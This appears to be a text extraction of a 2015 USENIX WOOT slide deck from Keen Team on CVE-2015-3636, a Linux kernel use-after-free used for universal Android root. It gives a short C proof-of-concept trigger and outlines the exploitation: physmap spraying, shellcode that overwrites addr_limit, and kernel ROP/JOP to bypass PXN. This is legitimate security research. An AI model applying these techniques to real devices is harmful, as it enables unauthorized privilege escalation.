Own your Android! Yet Another Universal Root Wen Xu Yubin Fu - - PowerPoint PPT Presentation

Own your Android! Yet Another Universal Root

Wen Xu Yubin Fu xuwen.sjtu@gmail.com QooBee1993@gmail.com Keen Team

Usenix Woot 15' 1

About Me

• Security research intern at Keen Team

– Mobile vulnerability research

• Android Rooting

– Software Exploitation

• Undergraduate student at Shanghai Jiao Tong

University

– Research member of LoCCS

Usenix Woot 15' 2

Introduction

• Universal Android root solution by Keen Team

– CVE-2015-3636 kernel use-after-free vulnerability – Undocumented overwriting techniques targeting kernel use-after-free vulnerabilities

• Reliable
• Universal applied

– First 64bit root case in the world

• PingPongRoot
• PXN bypassed by kernel ROP

Usenix Woot 15' 3

Roadmap

• Vulnerability (CVE-2015-3636)
• Proof-of-Concept
• Exploitation

– Goal – Re-filling – 64bit devices – Privilege escalation

• Conclusion

Usenix Woot 15' 4

Roadmap

• Vulnerability (CVE-2015-3636)
• Proof-of-Concept
• Exploitation

– Goal – Re-filling – 64bit devices – Privilege escalation

• Conclusion

Usenix Woot 15' 5

Vulnerability (CVE-2015-3636)

• Critical paging fault at 0x200200

Usenix Woot 15' 6

Vulnerability (CVE-2015-3636)

Usenix Woot 15' 7

• sk: PING socket object in kernel

Vulnerability (CVE-2015-3636)

• Ping_unhash(hlist_nulls_del) two times

– LIST_POISON2 == 0x200200 – 0x200200 not mapped -> kernel crash

Usenix Woot 15' 8

Vulnerability (CVE-2015-3636)

• Invoke connect() in user program two times

– sa_family == AP_UNSPEC

Usenix Woot 15' 9

Vulnerability (CVE-2015-3636)

• Review ping_unhash

– Map 0x200200 to avoid crash – sock_put(sk)?

Usenix Woot 15' 10

Vulnerability (CVE-2015-3636)

• sock_put(sk) twice -> ref-count is 0 -> sk_free
• A dangling file descriptor in the user program

Usenix Woot 15' 11

Roadmap

• Vulnerability (CVE-2015-3636)
• Proof-of-Concept
• Exploitation

– Goal – Re-filling – 64bit devices – Privilege escalation

• Conclusion

Usenix Woot 15' 12

Proof-of-Concept

• Work only on Android devices

– int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP); – struct sockaddr addr = { .sa_family = AF_INET }; – int ret = connect(sockfd, &addr, sizeof(addr)); – struct sockaddr _addr = { .sa_family = AF_UN- SPEC }; – ret = connect(sockfd, &_addr, sizeof(_addr)); – ret = connect(sockfd, &_addr, sizeof(_addr));

Usenix Woot 15' 13

Roadmap

• Vulnerability (CVE-2015-3636)
• Proof-of-Concept
• Exploitation

– Goal – Re-filling – 64bit devices – Privilege escalation

• Conclusion

Usenix Woot 15' 14

Exploitation: Goal

• Control the content of freed PING objects
• close(fd) to hijack control flow of the kernel

Usenix Woot 15' 15

Roadmap

• Vulnerability (CVE-2015-3636)
• Proof-of-Concept
• Exploitation

– Goal – Re-filling – 64bit devices – Privilege escalation

• Conclusion

Usenix Woot 15' 16

Exploitation: Re-filling

• Difficulties of exploiting UAF in the kernel:

– Slab allocator: Separation between objects – Few candidates: Lack of controllability of kernel

• bjects

– Multi-thread/core: Unpredictable kernel heap layout – Content control: Lack of controllability of content

• f kernel objects

Usenix Woot 15' 17

Exploitation: Re-filling

• PING socket object in Linux kernel

– In custom use cache: “PING” cache – kmem_cache_alloc(“PING”, priority & ~__GFP_ZERO);

• Size varies on different Android devices

Usenix Woot 15' 18

Exploitation: Re-filling

• Physmap, the direct-mapped memory, is memory in the

kernel which would directly map the memory in the user space into the kernel space. – ret2dir: Rethinking Kernel Isolation (USENIX 14’)

Usenix Woot 15' 19

Exploitation: Re-filling

• How to create: iteratively mmap() in user

space

• Data control: fully user-controlled (fill

mmap()’ed area with our payload)

• Physmap with payload grows by occupying the

free memory in the kernel

Usenix Woot 15' 20

Exploitation: Re-filling

• Size control: Large enough to fill any freed memory in

the kernel theoretically

• Exploit UAF bugs regardless of types of vulnerable
• bjects

Usenix Woot 15' 21

Exploitation: Re-filling

• Info leak by ioctl(): get to know whether the
• verwriting is done or not

– A dword value inside the object

Usenix Woot 15' 22

Exploitation: Re-filling

• 1. Allocate hundreds of PING socket objects in group.

– Every M padding objects with N targeting object considered as a vulnerable one.

• 2. Free padding PING socket objects normally by calling

close()

• 3. Free targeting PING socket objects by triggering the bug

– Such de-allocation generates large pieces of free memory for physmap

• 4. Iteratively call mmap() in user space and fill the areas

– Payload + magic number for re-filling checking

• 5. Iteratively call ioctl() on targeting PING socket objects

– ioctl() returns magic number? Done.

• 6. Otherwise further physmap spraying is needed.

Usenix Woot 15' 23

Roadmap

• Vulnerability (CVE-2015-3636)
• Proof-of-Concept
• Exploitation

– Goal – Re-filling – 64bit devices – Privilege escalation

• Conclusion

Usenix Woot 15' 24

Exploitation: 64bit devices

• The exploitation strategy is applied for 64bit

Android devices.

• LIST_POISON2

– Remains to be 0x200200

• Physmap is proved to be able to cover SLAB

caches on 64bit devices.

Usenix Woot 15' 25

Roadmap

• Vulnerability (CVE-2015-3636)
• Proof-of-Concept
• Exploitation

– Goal – Re-filling – 64bit devices – Privilege escalation

• Conclusion

Usenix Woot 15' 26

Exploitation: Privilege escalation

• For most 32bit Android devices:

– When pc controlled, return to shellcode in user space – What does shellcode do?

• Leak kernel stack address to get thread_info address
• Overwrite addr_limit to 0 to achieve kernel arbitrary

read/write ability

Usenix Woot 15' 27

Exploitatoin: Privilege escalation

• For many 64bit devices, PXN is applied.

– Ret2usr no longer works. – Kernel ROP is required. – 2 ROP chains:

• 1 for leakage
• 1 for overwriting

– Hardcoded address of gadgets

Usenix Woot 15' 28

Exploitatoin: Privilege escalation

• JOP (Jump-Oriented-Programming) is preferred:

– To avoid stack pivoting in kernel which brings uncertainty – Make full use of current values of the registers

• High 32bits of kernel addresses are the same

– Only need to read/write low 32bits

• Work hard to find cool gadgets

– One GOD gadget does both leaking and overwriting in some ROMs

Usenix Woot 15' 29

Roadmap

• Vulnerability (CVE-2015-3636)
• Proof-of-Concept
• Exploitation

– Goal – Re-filling – 64bit devices – Privilege escalation

• Conclusion

Usenix Woot 15' 30

Conclusion

• We propose a universal applied attack strategy

for use-after-free vulnerabilities in Linux kernel.

• We achieve root on popular Android devices
• n market.

– First 64bit root case in the world

Usenix Woot 15' 31

Acknowledgement

• Keen Team

– wushi – James Fang – Liang Chen – Slipper – Peter

Usenix Woot 15' 32

References

• 1. V. P. Kemerlis, M. Polychronakis, and A. D. Keromytis. ret2dir: Rethinking

kernel isolation. USENIX Security Symposium, 2014.

• 2. Jon Oberheide, Dan Rosenberg. Stackjacking Your Way to grsecurity/PaX
• Bypass. INFILTRATE 2011.
• 3. https://www.kernel.org/doc/Documentation/vm/slub.txt.
• 4. Vasileios P. Kemerlis, Georgios Portokalidis, and Angelos D. Keromytis.

kGuard: Lightweight Kernel Protection against Return-to-user Attacks. USENIX Security Symposium, 2012.

• 5. Marco Prandini and Marco Ramilli. Return-oriented programming.

Security and Privacy, IEEE, 2012.

• 6. Tyler Bletsch, Xuxian Jiang, Vince W. Freeh, Zhenkai Liang. Jump-

Oriented Programming: A New Class of Code-Reuse Attack. Proceedings of the 6th ACM Symposium on Information, Computer and Communications

• Security. ACM, 2011.

Usenix Woot 15' 33

• Thank you!
• Q&A

Usenix Woot 15' 34